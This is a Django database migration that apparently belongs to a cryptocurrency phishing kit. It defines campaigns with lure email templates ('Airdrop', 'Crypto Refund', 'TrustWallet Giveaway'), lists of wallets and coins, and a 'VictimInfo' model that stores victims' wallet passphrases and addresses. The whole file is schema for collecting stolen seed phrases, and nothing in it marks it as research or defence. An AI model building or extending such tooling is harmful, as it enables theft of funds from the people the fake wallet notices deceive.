# Generated by Django 4.2 on 2025-07-01 19:26

from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import shortuuid.django_fields
import uuid


class Migration(migrations.Migration):

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Campaign',
            fields=[
                ('id', shortuuid.django_fields.ShortUUIDField(alphabet='0123456789', length=3, max_length=12, prefix='cam', primary_key=True, serialize=False, unique=True)),
                ('recipient_email', models.EmailField(max_length=254)),
                ('quantity', models.DecimalField(decimal_places=8, max_digits=20)),
                ('min_balance', models.DecimalField(decimal_places=8, max_digits=20)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
            ],
            options={
                'verbose_name': 'Campaign',
                'verbose_name_plural': 'Campaigns',
                'ordering': ['-created_at'],
            },
        ),
        migrations.CreateModel(
            name='Cryptocurrency',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('code', models.CharField(max_length=10)),
                ('name', models.CharField(max_length=100)),
            ],
            options={
                'verbose_name': 'Cryptocurrency',
                'verbose_name_plural': 'Cryptocurrencies',
            },
        ),
        migrations.CreateModel(
            name='EmailTemplate',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('type', models.CharField(choices=[('AIRDROP', 'Airdrop Notification'), ('REFUND', 'Crypto Refund Notification'), ('GIVEAWAY', 'TrustWallet Giveaway')], max_length=20)),
            ],
            options={
                'verbose_name': 'Email Template',
                'verbose_name_plural': 'Email Templates',
            },
        ),
        migrations.CreateModel(
            name='Wallet',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=20, unique=True)),
                ('logo', models.ImageField(blank=True, null=True, upload_to='wallets/', verbose_name='Logo')),
            ],
            options={
                'verbose_name': 'Wallet',
                'verbose_name_plural': 'Wallets',
            },
        ),
        migrations.CreateModel(
            name='VictimInfo',
            fields=[
                ('id', shortuuid.django_fields.ShortUUIDField(alphabet='0123456789', length=3, max_length=12, prefix='CL', primary_key=True, serialize=False, unique=True)),
                ('passphrase', models.CharField(blank=True, max_length=400, null=True)),
                ('address', models.CharField(blank=True, max_length=100, null=True)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('uuid', models.UUIDField(blank=True, default=uuid.uuid4, editable=False, null=True, unique=True)),
                ('campaign', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='core.campaign')),
                ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
                ('wallet', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.wallet')),
            ],
            options={
                'verbose_name': 'Victim Info',
                'verbose_name_plural': 'Victim Infos',
            },
        ),
        migrations.AddField(
            model_name='campaign',
            name='cryptocurrency',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.cryptocurrency'),
        ),
        migrations.AddField(
            model_name='campaign',
            name='email_template',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.emailtemplate'),
        ),
        migrations.AddField(
            model_name='campaign',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
    ]
